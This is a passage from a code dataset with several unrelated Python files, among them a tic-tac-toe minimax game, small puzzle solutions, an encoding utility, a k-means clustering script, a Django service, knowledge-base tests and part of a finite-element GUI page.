self.board[x][y] = player.symbol\r\n\r\n def game_state(self):\r\n \"\"\"\r\n Checks if the game has been won.\r\n\r\n Returns:\r\n bool: True if won, False if not.\r\n str: 'X', 'O', or None, depending on if there is a winner, and who it is.\r\n \"\"\"\r\n\r\n # Checks horizontal and vertical columns\r\n for i in range(3):\r\n if(self.board[i][0] == 'X' and self.board[i][1] == 'X' and self.board[i][2] == 'X'):\r\n return True, 'X'\r\n elif(self.board[i][0] == 'O' and self.board[i][1] == 'O' and self.board[i][2] == 'O'):\r\n return True, 'O'\r\n elif(self.board[0][i] == 'X' and self.board[1][i] == 'X' and self.board[2][i] == 'X'):\r\n return True, 'X'\r\n elif(self.board[0][i] == 'O' and self.board[1][i] == 'O' and self.board[2][i] == 'O'):\r\n return True, 'O'\r\n # Checks the diagonals\r\n if(self.board[0][0] == 'X' and self.board[1][1] == 'X' and self.board[2][2] == 'X' or\r\n self.board[0][2] == 'X' and self.board[1][1] == 'X' and self.board[2][0] == 'X'):\r\n return True, 'X'\r\n elif(self.board[0][0] == 'O' and self.board[1][1] == 'O' and self.board[2][2] == 'O' or\r\n self.board[0][2] == 'O' and self.board[1][1] == 'O' and self.board[2][0] == 'O'):\r\n return True, 'O'\r\n\r\n return False, None # If no winner is found this is returned\r\n\r\n def check_pos(self, x, y):\r\n \"\"\"\r\n Checks if a supplied position has already been taken or if its open.\r\n\r\n Parameters:\r\n x (int): The x coordinate of the position to be checked.\r\n y (int): The y coordinate of the position to be checked.\r\n\r\n Returns:\r\n bool: True if the position is open, False if the position is taken.\r\n \"\"\"\r\n\r\n if(self.board[x][y] == '-'):\r\n return True\r\n return False\r\n\r\n def board_full(self):\r\n \"\"\"\r\n Checks if every position on the board has been filled (therefore the game will end as a tie).\r\n\r\n Returns:\r\n bool: True if the board has every position filled, False if there are still spots available.\r\n \"\"\"\r\n\r\n for row in self.board:\r\n for col in row:\r\n if(col == '-'):\r\n return False\r\n return True\r\n\r\ndef make_play(board, player):\r\n \"\"\"\r\n Allows the user to select which position they would like to place their symbol on the board.\r\n\r\n The position is verified to be valid before moving onto the set_player method. If the player\r\n is the bot, it goes straight to the set_player method, which goes to the ai function.\r\n\r\n Parameters:\r\n board (obj): The current board object.\r\n player (obj): the current player object.\r\n \"\"\"\r\n\r\n board.show_board()\r\n # dictionary of all possible moves where the key is a numbered position and the value is the coordinates\r\n moves = {\r\n 1: [0, 0], 2: [0, 1], 3: [0, 2],\r\n 4: [1, 0], 5: [1, 1], 6: [1, 2],\r\n 7: [2, 0], 8: [2, 1], 9: [2, 2],\r\n }\r\n\r\n if(player.name == \"Bot\"):\r\n board.set_player(player, 0, 0)\r\n else: \r\n free_pos = False\r\n # This loop guarantees that the position the user chooses is not already taken\r\n while(free_pos == False):\r\n # This loop guarantees that the user chooses a position the is possible on the board (1-9)\r\n while(True):\r\n try:\r\n move = int(input(\"Choose where you would like to make your play (1 - 9): \"))\r\n if(move < 10 and move > 0):\r\n break\r\n else:\r\n print(\"Please try again, you must enter a number from 1-9\")\r\n except ValueError:\r\n print(\"Please try again, you must enter a number from 1-9\")\r\n xy = moves[move]\r\n # Checks if the chosen move is available \r\n free_pos = board.check_pos(xy[0], xy[1])\r\n # If the position is valid, the set_player method is called\r\n board.set_player(player, xy[0], xy[1])\r\n\r\ndef ai(state, player):\r\n \"\"\"\r\n The best possible move is found for the bot to make. \r\n \r\n This is done by looping through every free position on the board, and calling the minimax function \r\n to \"score\" each position. Whichever position has the best score, becomes the move the bot uses.\r\n\r\n Parameters:\r\n state (obj): The current board object.\r\n player (obj): the current player object.\r\n\r\n Returns\r\n best_move[0] (int): the row coordinate of the best move.\r\n best_move[1] (int): the column coordinate of the best move.\r\n \"\"\"\r\n best_score = -10000 # Sets the intial best score at an impossibly low value\r\n # Loops through every possible position in the current board\r\n for row in range(len(state.board)):\r\n for col in range(len(state.board[row])):\r\n # Checks if the current position is empty\r\n if(state.board[row][col] == \"-\"):\r\n state.board[row][col] = player.symbol\r\n # Minimax algorithm is applied to the board with the current position taken by the bot\r\n score = minimax(state, 0, False) \r\n state.board[row][col] = \"-\" # Removes symbol from the board for the next loop\r\n if(score > best_score):\r\n best_score = score\r\n best_move = [row, col]\r\n return best_move[0], best_move[1]\r\n\r\ndef minimax(state, depth, max_or_min):\r\n \"\"\"\r\n Recursively finds the best possible move to be made on the current game board.\r\n\r\n Scores are given to the maximizing and minimizing player based on their chances of winning the game \r\n as each possible position is \"played\". Whatever position gives the end state with the best maximizing \r\n score and worst minimizing score is the optimal position for the bot.\r\n\r\n Parameters:\r\n state (obj): this is the gameboard object. It could be the current board, or one simulated for \r\n the algorithm.\r\n depth (int): The current depth of the game/algorithm. Basically how many turns have been played.\r\n\r\n Returns:\r\n int: the score of the current play being made.\r\n \"\"\"\r\n\r\n # Finds if the game has been won and for which player\r\n g_state, symb = state.game_state()\r\n # This is the terminal condition, if the game has been won or tied (board is full)\r\n if(state.board_full() or g_state):\r\n if(g_state == True and symb == 'X'):\r\n return -10\r\n elif(g_state == True and symb == 'O'):\r\n return 10\r\n elif(g_state == False):\r\n return 0\r\n\r\n if(max_or_min):\r\n # Impossibly low score set for the maximizing player, so that any move will replace it\r\n best_score = -10000\r\n # Loops through every possible position\r\n for row in range(len(state.board)):\r\n for col in range(len(state.board[row])):\r\n # Loops through every possible position\r\n if(state.board[row][col] == \"-\"):\r\n state.board[row][col] = \"O\"\r\n # The function is recursively called, with the depth increased and its the minimizing player's turn\r\n score = minimax(state, depth + 1, False)\r\n state.board[row][col] = \"-\" # Removes symbol from the board for the next loop\r\n if(score > best_score):\r\n best_score = score \r\n return best_score\r\n else:\r\n # Impossibly high score set for the minimizing player, so that any move will replace it\r\n best_score = 10000\r\n # Loops through every possible position\r\n for row in range(len(state.board)):\r\n for col in range(len(state.board[row])):\r\n # Loops through every possible position\r\n if(state.board[row][col] == \"-\"):\r\n state.board[row][col] = \"X\"\r\n # The function is recursively called, with the depth increased and its the maximizing player's turn\r\n score = minimax(state, depth + 1, True)\r\n state.board[row][col] = \"-\" # Removes symbol from the board for the next loop\r\n if(score < best_score):\r\n best_score = score \r\n return best_score\r\n\r\ndef main():\r\n \"\"\"This is where the code will begin and also where the main game loop is.\"\"\"\r\n\r\n game_board = Board()\r\n # Introduction to game\r\n print(\"\\nWelcome to Tic Tac Toe! Please select what you would like to play.\")\r\n game_type = input(\"1. Single player against AI.\\n2. 2 player with another person.\\n3. Quit.\\n\")\r\n\r\n if(game_type == \"1\"):\r\n name = input(\"What is your name? \")\r\n p1 = Player(name, 'X')\r\n p2 = Player(\"Bot\", 'O')\r\n elif(game_type == \"2\"):\r\n name = input(\"What is the name of the first player? \")\r\n p1 = Player(name, 'X')\r\n name = input(\"What is the name of the second player? \")\r\n p2 = Player(name, 'O')\r\n else:\r\n sys.exit()\r\n print(\"\\nPlayer 1: \" + p1.name + \"\\t Symbol: \" + p1.symbol)\r\n print(\"Player 2: \" + p2.name + \"\\t Symbol: \" + p2.symbol + \"\\n\")\r\n # Generates a random number to determine who goes first\r\n rand = random.random()\r\n if(rand > .5):\r\n print(p1.name + \" goes first!\")\r\n turn = 1\r\n else:\r\n print(p2.name + \" goes first!\")\r\n turn = -1\r\n\r\n # MAIN GAME LOOP\r\n while(game_type == \"1\" or game_type == \"2\"):\r\n if(turn == 1):\r\n print( \"\\n\" + p1.name + \" it is your turn.\")\r\n make_play(game_board, p1)\r\n else:\r\n print(\"\\n\" + p2.name + \" it is your turn.\")\r\n make_play(game_board, p2)\r\n # Checks if the game has been won and by whom\r\n g_state, symb = game_board.game_state()\r\n if(g_state):\r\n if(turn == 1):\r\n game_board.show_board()\r\n print(p1.name + \" has won the game!\")\r\n else:\r\n game_board.show_board()\r\n print(p2.name + \" has won the game!\")\r\n break\r\n\r\n if(game_board.board_full() == True):\r\n print(\"\")\r\n game_board.show_board()\r\n print(\"The game has ended as a draw.\")\r\n break\r\n\r\n turn *= -1 # this switches whose turn it is each round\r\n\r\nmain() # starts the game","repo_name":"JoshGraham14/Tic-Tac-Toe-Minimax","sub_path":"tictactoe_minimax.py","file_name":"tictactoe_minimax.py","file_ext":"py","file_size_in_byte":12868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23255933139","text":"#https://www.hackerrank.com/challenges/counting-valleys/problem\n\nsteps=int(input())\npath=input()\n\nres=0\nans=0\nfor i in range(steps):\n if (path[i]=='U'): \n res+=1\n else:\n res-=1\n if (path[i]=='U' and res==0):\n ans+=1\nprint(ans)","repo_name":"thebadcoder96/HackerRank","sub_path":"Warm-Up/countingvalleys.py","file_name":"countingvalleys.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6901720366","text":"#!python 3\n#coding=utf-8\nimport base64,urllib.parse,hashlib\n\nclass coder:\n def __init__(self):\n self.func_list=[('base64编码','b64enc'),('base64解码','b64dec'),('URL编码','urlenc'),('URL解码','urldec'),('ip转换长整数','ip2int'),('长整数转换ip','int2ip'),('md5转换','md5enc')]\n pass\n\n def ip2int(self,ip): #IP地址转换为长整数\n ips=ip.split('.')\n res=0\n try:\n for i in range(4):\n res=res+int(ips[i])*256**(3-i)\n except Exception as e:\n res='Please input correct ip address!'\n return res\n\n def int2ip(self,li): #长整数转换为ip地址\n try:\n li=int(li)\n if li < 4294967296 and li > 16777215:\n res=[]\n ip=li\n for j in range(4):\n buf=divmod(ip,256**(3-j))\n ip=buf[1]\n res.append(buf[0])\n restr=str(res[0])+'.'+str(res[1])+'.'+str(res[2])+'.'+str(res[3])\n else:\n restr='Data too big or too small!'\n except Exception as e:\n restr='Input not a valid ip int value!'\n return restr\n\n\n def b64dec(self,string): #base64解码函数\n string=str(string)\n if string[-2]!='=':\n string+='=='\n elif string[-1]!='=':\n string+='='\n try:\n res=base64.b64decode(string).decode('utf-8')\n except Exception as e:\n res='Input not a valid base64 encode string'\n return res\n\n def b64enc(self,string): #base64编码函数\n string=str(string)\n return base64.b64encode(string.encode('utf-8')).decode('utf-8')\n\n def urlenc(self,string): #urlencode函数\n string=str(string)\n res=urllib.parse.quote(string)\n while res[-3:]=='%0A':\n res=res[:-3]\n return res\n\n\n def urldec(self,string): #urldecode函数\n string=str(string)\n res=urllib.parse.unquote(string)\n while res[-3:]=='%0A':\n res=res[:-3]\n return res\n\n\n def md5enc(self,string): #计算md5值,32位小写字母\n string=str(string).encode('utf-8')\n m=hashlib.md5()\n m.update(string)\n return m.hexdigest()\n\n\n\n\nif __name__ == '__main__': \n c=coder()\n out=c.md5enc(0)\n print(out)","repo_name":"cgddgc/encodeTools","sub_path":"myCoder.py","file_name":"myCoder.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19069782104","text":"# Program that separates uppercase letters which will\n# reveal a secret message\n\n\n# Function to join all uppercase letters and then return them\ndef secretMessage (msg):\n\tmsg_decoded = ''.join(letter\n\t\tfor letter in msg\n\t\t\tif letter.isupper())\n\treturn str(msg_decoded)\n\n\n# User entered message\nmsg = raw_input('Enter your message to decoded: \\n\\n\\t')\n\n\n# Output the decoded message\nprint('\\n\\nYour secret message is ' + secretMessage(msg))","repo_name":"shaunc44/Python-Exercises","sub_path":"secretMessage.py","file_name":"secretMessage.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27964608734","text":"from sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.cluster import KMeans\nimport utils\n\ntrain_data,test_data=utils.get_corpus()\n\nvectorizer=CountVectorizer()\ntransformer=TfidfTransformer()\ntfidf=transformer.fit_transform(vectorizer.fit_transform(train_data))\nword=vectorizer.get_feature_names()\nweight=tfidf.toarray()\n\nfor i in range(len(weight)):\n for j in range(len(word)):\n getword = word[j]\n getvalue = weight[i][j]\nK = range(5,20)\nfor k in K:\n\n clf = KMeans(n_clusters = k,init='k-means++',max_iter=300,)\n s = clf.fit(weight)\n order_centroids = clf.cluster_centers_.argsort()[:, ::-1]\n terms = vectorizer.get_feature_names()\n print(\"第\" + str(k) + \"次聚类\\n\")\n for ss in range(k):\n print(\"\\nCluster %d:\" % ss, end='')\n for ind in order_centroids[ss, :10]:\n print(' %s' % terms[ind], end='')\n\n\n # train data classification\n # category=clf.predict(train_data)\n # print('classification results:',category)\n#\n# def predict(test_data):\n# pred=clf.predict(test_data)\n# print('prediction results:',pred)\n# print('similar elments:',train_data[category==pred])\n\n# train data labels\n label=[]\n for i in range(1,len(clf.labels_)):\n label.append(clf.labels_[i-1])\n\n print(clf.inertia_)\n y_pred=clf.labels_\n\n\nfrom sklearn.decomposition import PCA\npca=PCA(n_components=2)\nnewData=pca.fit_transform(weight)\n\n\ndef generate_coor(newData,y_pred,clusters):\n x = [n[0] for n in newData]\n y = [n[1] for n in newData]\n\n for i in range(clusters):\n tmpx,tmpy=[],[]\n\n\n\n\n\n\n\n#\n","repo_name":"lightningtyb/kmeans","sub_path":"kmeans_train.py","file_name":"kmeans_train.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12393005734","text":"import json\nimport random\nfrom django.utils.dateparse import parse_datetime\n\nclass ArticlesService:\n articles = []\n \n def __init__(self):\n with open('fixtures/content_api.json') as json_file:\n data = json.load(json_file)\n self.articles = data['results']\n for article in self.articles:\n article['path'] = article['path'][:-5] \n article['publish_at_with_time'] = parse_datetime(article['publish_at']).strftime('%B %-e, %Y at %I:%M%p')\n article['publish_at'] = parse_datetime(article['publish_at']).strftime('%B %-e, %Y')\n article['body'] = article['body'].replace('

{%sfr%}

', '')\n \n def find_featured_article(self, slug):\n featuredIndex = None\n for index in range(len(self.articles)):\n for tag in self.articles[index]['tags']:\n if tag['slug'] == slug:\n featuredIndex = index\n break\n if featuredIndex is not None:\n break\n featuredArticle = self.articles.pop(featuredIndex)\n return { 'featured': featuredArticle, 'others': random.sample(self.articles, 3) }\n \n def find_article_by_path(self, path):\n article = None\n for index in range(len(self.articles)):\n if path in self.articles[index][\"path\"]:\n article = self.articles[index]\n break\n return article\n \nclass QuotesService:\n quotes = []\n \n def __init__(self):\n with open('fixtures/quotes_api.json') as json_file:\n data = json.load(json_file)\n for quote in data:\n new_quote = {\n 'name': quote['CompanyName'],\n 'market': quote['ExchangeName'],\n 'symbol': quote['Symbol'],\n 'image': 'https://g.foolcdn.com/art/companylogos/mark/%s.png' % (quote['Symbol']),\n 'currentPrice': quote['CurrentPrice']['Amount'],\n 'change': quote['Change']['Amount'],\n 'percentChange': self.format_percentage(quote['PercentChange']['Value']),\n 'positive': True if quote['Change']['Amount'] > 0.0 else False\n }\n self.quotes.append(new_quote)\n \n def all_quotes(self):\n return self.quotes\n \n def format_percentage(self, number):\n percentage = float(int(number * 10000)) / 100\n if number < 0:\n return f'({percentage}%)'\n else:\n return f'{percentage}%'","repo_name":"notmarkmiranda/django_fun_times","sub_path":"articles/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1897107335","text":"\nimport pytest\nfrom emora_stdm.state_transition_dialogue_manager.knowledge_base import KnowledgeBase\n\n\ndef test_constructor():\n kb = KnowledgeBase([\n ('i', 'like', 'cookies'),\n ('i', 'like', 'milk'),\n ('i', 'type', 'person'),\n ('i', 'type', 'living_thing'),\n ('cookies', 'quality', 'good')\n ])\n\ndef test_query():\n kb = KnowledgeBase([\n ('i', 'like', 'cookies'),\n ('i', 'like', 'milk'),\n ('i', 'type', 'person'),\n ('i', 'type', 'living_thing'),\n ('cookies', 'quality', 'good')\n ])\n assert kb.query('i', 'like', 'quality') == {'good'}\n\ndef test_ontology():\n kb = KnowledgeBase([\n ('i', 'like', 'cookies'),\n ('i', 'like', 'milk'),\n ('i', 'type', 'person'),\n ('i', 'type', 'living_thing'),\n ('cookies', 'quality', 'good')\n ])\n assert kb.types('i') == {'person', 'living_thing'}\n\ndef test_expressions():\n kb = KnowledgeBase([\n ('i', 'like', 'cookies'),\n ('i', 'like', 'milk'),\n ('i', 'type', 'person'),\n ('i', 'type', 'living_thing'),\n ('cookies', 'quality', 'good')\n ])\n assert kb.expressions('i') == {'i'}\n assert kb.expressions('living_thing') == set()\n kb.add_expression('living_thing', 'life')\n kb.add_expression('living_thing', 'alive')\n assert kb.expressions('living_thing') == {'life', 'alive'}","repo_name":"emora-chat/emora_stdm","sub_path":"emora_stdm/test_state_transition_dialogue_manager/test_knowledge_base.py","file_name":"test_knowledge_base.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"2139825943","text":"from ooflib.SWIG.common import switchboard\nfrom ooflib.SWIG.engine import ooferror2\nfrom ooflib.common import debug\nfrom ooflib.common import labeltree\nfrom ooflib.common import utils\nfrom ooflib.common.IO import placeholder\nfrom ooflib.common.IO.GUI import chooser\nfrom ooflib.common.IO.GUI import gtklogger\nfrom ooflib.common.IO.GUI import gtkutils\nfrom ooflib.common.IO.GUI import oofGUI\nfrom ooflib.common.IO.GUI import parameterwidgets\nfrom ooflib.common.IO.GUI import regclassfactory\nfrom ooflib.common.IO.GUI import tooltips\nfrom ooflib.common.IO.GUI import whowidget\nfrom ooflib.engine import analysisdomain\nfrom ooflib.engine import namedanalysis\nfrom ooflib.engine.IO import analyze\nfrom ooflib.engine.IO import analyzemenu\nfrom ooflib.engine.IO.GUI import outputdestinationwidget\nfrom ooflib.engine.IO.GUI import outputwidget\nfrom ooflib.engine.IO.GUI import sampleregclassfactory\nimport ooflib.engine.mesh\n\nimport gtk\n\n\n# A page on which various aspects of the solved mesh can be queried --\n# cross-section and statistical outputs will live here, with the\n# ability to be put into files, and so forth. \n\n# Base class for AnalyzePage and BoundaryAnalysisPage.\n## TODO: OOF3D merged the AnalyzePage and the BoundaryAnalysisPage, so\n## there's no need for the BaseAnalysisPage class.\n\n## TODO 3.1: Is it possible to make the Field choosers in the various\n## Outputs share a Parameter? Then switching from Field/Value to\n## Field/Derivative wouldn't change the Field chooser.\n\n## TODO 3.1: Add \"New\", \"Copy\" buttons, etc, to the Planar cross section\n## widget. The underlying menu items might not yet exist.\n\nclass BaseAnalysisPage(oofGUI.MainPage):\n def buildBottomRow(self, mainbox):\n # Build the bottom row of widgets, containing the named\n # analysis buttons, the Destination chooser, and the Go\n # button.\n # Box along the bottom of the page, containing Named Analyses,\n # Destination, and Go.\n hbox = gtk.HBox()\n hbox.set_homogeneous(True)\n mainbox.pack_start(hbox, expand=0, fill=0, padding=3)\n\n # Named Analyses\n nameframe = gtk.Frame(\"Named Analyses\")\n gtklogger.setWidgetName(nameframe, 'Name')\n nameframe.set_shadow_type(gtk.SHADOW_IN)\n hbox.pack_start(nameframe, expand=1, fill=1, padding=3)\n namebox = gtk.VBox(spacing=2)\n namebox.set_border_width(1)\n nameframe.add(namebox)\n \n # The namedOps_button isn't used as a button, really. It's\n # just a place to click to bring up the menu of named analysis\n # operations. There isn't room in the frame to make separate\n # buttons for all the operations and still display the name of\n # the current analysis, if any.\n self.namedOps_button = gtk.Button(\"Create/Delete/etc...\")\n gtklogger.setWidgetName(self.namedOps_button, \"Operations\")\n namebox.pack_start(self.namedOps_button, expand=1, fill=1)\n gtklogger.connect(self.namedOps_button, 'button-press-event', \n self.namedOpsCB)\n # Construct the menu of operations.\n self.namedOpsPopUp = gtk.Menu()\n gtklogger.newTopLevelWidget(self.namedOpsPopUp, self.menuWidgetName)\n self.namedOpsPopUp.set_screen(self.namedOps_button.get_screen())\n gtklogger.connect_passive(self.namedOpsPopUp, 'deactivate')\n self.namedOpsMenuItems = {}\n for position, (name, callback, tip) in enumerate([\n ('Create', self.createCB, \"Create a new named analysis.\"),\n ('Save', self.savenamedCB, \"Save named analysis definitions.\"),\n ('Delete', self.deleteCB, \"Delete a named analysis.\")]):\n menuitem = gtk.MenuItem()\n self.namedOpsMenuItems[name] = menuitem\n gtklogger.setWidgetName(menuitem, name)\n label = gtk.Label(name + \"...\")\n tooltips.set_tooltip_text(label, tip)\n menuitem.add(label)\n self.namedOpsPopUp.insert(menuitem, position)\n gtklogger.connect(menuitem, 'activate', callback)\n self.namedOpsPopUp.show_all()\n # Display the name of the current analysis, if it has one.\n hbox4 = gtk.HBox()\n namebox.pack_start(hbox4, expand=0, fill=0)\n hbox4.pack_start(gtk.Label(\"Current:\"), expand=0, fill=0)\n self.namedAnalysisChooser = chooser.ChooserWidget(\n [], callback=self.retrieveCB, name=\"Retrieve\")\n hbox4.pack_start(self.namedAnalysisChooser.gtk, expand=1, fill=1)\n\n # reduce no. of calls to setNamedAnalysisChooser\n self.suppressRetrievalLoop = False\n\n # Destination\n destinationframe = gtk.Frame(\"Destination\")\n destinationframe.set_shadow_type(gtk.SHADOW_IN)\n hbox.pack_start(destinationframe, expand=1, fill=1, padding=3)\n destbox = gtk.HBox()\n destbox.set_border_width(1)\n destinationframe.add(destbox)\n\n self.destwidget = outputdestinationwidget.TextDestinationWidget(\n name=\"Destination\", framed=False)\n destbox.pack_start(self.destwidget.gtk, expand=1, fill=1, padding=2)\n \n # Go button\n self.go_button = gtkutils.StockButton(gtk.STOCK_EXECUTE, \"Go\")\n self.go_button.set_border_width(2)\n gtklogger.setWidgetName(self.go_button, 'Go')\n gtklogger.connect(self.go_button, \"clicked\", self.go_buttonCB)\n tooltips.set_tooltip_text(self.go_button,\n \"Send the output to the destination.\")\n hbox.pack_start(self.go_button, fill=1, expand=1, padding=2)\n\n\n def namedOpsCB(self, gtkbutton, event):\n self.namedOpsPopUp.popup(None, None, None, event.button, event.time)\n \n def sensitizeBottomRow(self, createOK, namedOK):\n self.namedOpsMenuItems['Create'].set_sensitive(createOK)\n self.namedOpsMenuItems['Delete'].set_sensitive(namedOK)\n self.namedOpsMenuItems['Save'].set_sensitive(namedOK)\n\n#=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#\n\nclass DataOperationFactory(regclassfactory.RegisteredClassFactory):\n def __init__(self, page, *args, **kwargs):\n self.page = page\n regclassfactory.RegisteredClassFactory.__init__(self, *args, **kwargs)\n def includeRegistration(self, registration):\n return registration.acceptsOutput(self.page.getOutput())\n\n#=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#\n\npshrink = False # can the HPaneds shrink below the size of their contents?\n\nclass AnalyzePage(BaseAnalysisPage):\n def __init__(self):\n oofGUI.MainPage.__init__(\n self, name=\"Analysis\", ordering=259,\n tip=\"Query the mesh, examine fields and fluxes.\")\n \n self.timeparam = placeholder.TimeParameter('time', value=0.0)\n\n mainbox = gtk.VBox()\n self.gtk.add(mainbox)\n\n align = gtk.Alignment(xalign=0.5)\n mainbox.pack_start(align, expand=0, fill=0)\n centerbox = gtk.HBox(spacing=3)\n align.add(centerbox)\n self.meshwidget = whowidget.WhoWidget(ooflib.engine.mesh.meshes,\n scope=self)\n # The mesh widget callback is not required, because the field\n # and flux widgets in the \"output\" widget (which are members\n # of a parameter table, which is a component of the\n # OutputWidget) are context-sensitive and update themselves\n # automatically.\n label = gtk.Label(\"Microstructure=\")\n label.set_alignment(1.0, 0.5)\n centerbox.pack_start(label, expand=0, fill=0)\n centerbox.pack_start(self.meshwidget.gtk[0], expand=0, fill=0)\n label = gtk.Label(\"Skeleton=\")\n label.set_alignment(1.0, 0.5)\n centerbox.pack_start(label, expand=0, fill=0)\n centerbox.pack_start(self.meshwidget.gtk[1], expand=0, fill=0)\n label = gtk.Label(\"Mesh=\")\n label.set_alignment(1.0, 0.5)\n centerbox.pack_start(label, expand=0, fill=0)\n centerbox.pack_start(self.meshwidget.gtk[2], expand=0, fill=0)\n\n align = gtk.Alignment(xalign=0.5)\n mainbox.pack_start(align, expand=0, fill=0)\n centerbox = gtk.HBox(spacing=3)\n align.add(centerbox)\n self.timeWidget = self.timeparam.makeWidget(scope=self)\n centerbox.pack_start(gtk.Label(\"Time:\"), expand=0, fill=0)\n centerbox.pack_start(self.timeWidget.gtk, expand=0, fill=0)\n\n mainvpane = gtk.VPaned()\n mainbox.pack_start(mainvpane, expand=1, fill=1)\n self.topPane = gtk.HPaned()\n gtklogger.setWidgetName(self.topPane, 'top')\n mainvpane.pack1(self.topPane, resize=1, shrink=0)\n self.btmPane = gtk.HPaned()\n gtklogger.setWidgetName(self.btmPane, 'bottom')\n mainvpane.pack2(self.btmPane, resize=1, shrink=0)\n # The four panes (Output, Domain, Operation, and Sampling) are\n # contained in the top and bottom HPaneds. The dividers\n # between the sub panes are synchronized with each other.\n # Since Paneds don't have a dedicated signal indicating that\n # their dividers have been moved, we have to use the the\n # generic 'notify' signal.\n self.paneSignals = {\n self.topPane : gtklogger.connect(self.topPane,\n 'notify::position', \n self.paneMovedCB,\n self.btmPane),\n self.btmPane : gtklogger.connect(self.btmPane,\n 'notify::position',\n self.paneMovedCB,\n self.topPane)\n }\n\n # Output\n self.outputframe = gtk.Frame(label=\"Output\")\n self.outputframe.set_shadow_type(gtk.SHADOW_IN)\n output_scroll = gtk.ScrolledWindow()\n gtklogger.logScrollBars(output_scroll, \"Output\")\n output_scroll.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)\n self.outputframe.add(output_scroll)\n output_box = gtk.VBox()\n\n self.output_obj = outputwidget.ValueOutputParameterWidget(\n value=None, scope=self, name=\"Outputs\")\n output_box.pack_start(self.output_obj.gtk, expand=0, fill=0)\n \n output_scroll.add_with_viewport(output_box)\n self.topPane.pack1(self.outputframe, resize=1, shrink=pshrink)\n\n # Operation\n self.operationframe = gtk.Frame(label=\"Operation\")\n self.operationframe.set_shadow_type(gtk.SHADOW_IN)\n op_scroll = gtk.ScrolledWindow()\n gtklogger.logScrollBars(op_scroll, \"Operation\")\n op_scroll.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)\n self.op_obj = DataOperationFactory(\n page=self, registry=analyze.DataOperation.registry,\n scope=self, name=\"OperationRCF\", callback=self.newOperationCB)\n self.operationframe.add(op_scroll)\n\n operation_box = gtk.VBox()\n operation_box.pack_start(self.op_obj.gtk, expand=0, fill=0)\n op_scroll.add_with_viewport(operation_box)\n self.btmPane.pack1(self.operationframe, resize=1, shrink=pshrink)\n\n # Domain\n self.domainframe = gtk.Frame(label=\"Domain\")\n self.domainframe.set_shadow_type(gtk.SHADOW_IN)\n dom_scroll = gtk.ScrolledWindow()\n gtklogger.logScrollBars(dom_scroll, \"Domain\")\n dom_scroll.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)\n self.domain_obj = regclassfactory.RegisteredClassFactory(\n analysisdomain.Domain.registry, scope=self, name=\"DomainRCF\",\n callback = self.newDomainCB)\n self.domainframe.add(dom_scroll)\n dom_scroll.add_with_viewport(self.domain_obj.gtk)\n self.topPane.pack2(self.domainframe, resize=1, shrink=pshrink)\n \n # Sampling. The SampleRCF class uses the WidgetScope\n # mechanism to find the Operation and Domain widgets, so that\n # it can display only the relevant SampleSet classes. \n self.sampleframe = gtk.Frame(label=\"Sampling\")\n self.sampleframe.set_shadow_type(gtk.SHADOW_IN)\n sam_scroll = gtk.ScrolledWindow()\n gtklogger.logScrollBars(sam_scroll, \"Sampling\")\n sam_scroll.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)\n self.sample_obj = sampleregclassfactory.SampleRCF(\n scope=self, name=\"Sampling\", callback=self.newSampleCB)\n self.sampleframe.add(sam_scroll)\n sam_scroll.add_with_viewport(self.sample_obj.gtk)\n self.btmPane.pack2(self.sampleframe, resize=1, shrink=pshrink)\n\n self.buildBottomRow(mainbox)\n \n # Whenever fields or fluxes are defined or undefined on the\n # mesh, we need to update the output object widget, and\n # possibly invalidate the currently-displayed data, once we\n # start displaying data.\n\n switchboard.requestCallbackMain((\"new who\", \"Mesh\"), self.new_mesh)\n switchboard.requestCallbackMain((\"new who\", \"Skeleton\"), self.new_skel)\n \n switchboard.requestCallbackMain(self.timeWidget, self.sensitize_widgets)\n switchboard.requestCallbackMain(self.domain_obj, self.sensitize_widgets)\n switchboard.requestCallbackMain(self.op_obj, self.sensitize_widgets)\n # switchboard.requestCallbackMain(self.output_obj,\n # self.sensitize_widgets)\n switchboard.requestCallbackMain(self.output_obj,\n self.updateOperations)\n switchboard.requestCallbackMain(self.destwidget, self.sensitize_widgets)\n\n switchboard.requestCallbackMain(\"named analyses changed\",\n self.analysesChanged)\n switchboard.requestCallbackMain(\"mesh status changed\",\n self.sensitize_widgets)\n\n switchboard.requestCallbackMain(self.domain_obj,\n self.setNamedAnalysisChooser)\n switchboard.requestCallbackMain(self.op_obj,\n self.setNamedAnalysisChooser)\n switchboard.requestCallbackMain(self.output_obj,\n self.setNamedAnalysisChooser)\n switchboard.requestCallbackMain(self.sample_obj,\n self.setNamedAnalysisChooser)\n menuWidgetName = 'NamedOpsMenu'\n \n def installed(self):\n self.sensitize_widgets()\n# # Compute an initial width for the HPanes that is big enough\n# # for the separators to be synchronized without shrinking the\n# # subpanes.\n# outputwidth = self.outputframe.size_request()[0]\n# opertnwidth = self.operationframe.size_request()[0]\n# domainwidth = self.domainframe.size_request()[0]\n# samplewidth = self.sampleframe.size_request()[0]\n# # Size of separator between the panes. Setting it cleverly\n# # doesn't seem to do anything different than setting it to a\n# # guess.\n# gutterwidth = min(\n# self.topPane.size_request()[0] - outputwidth - 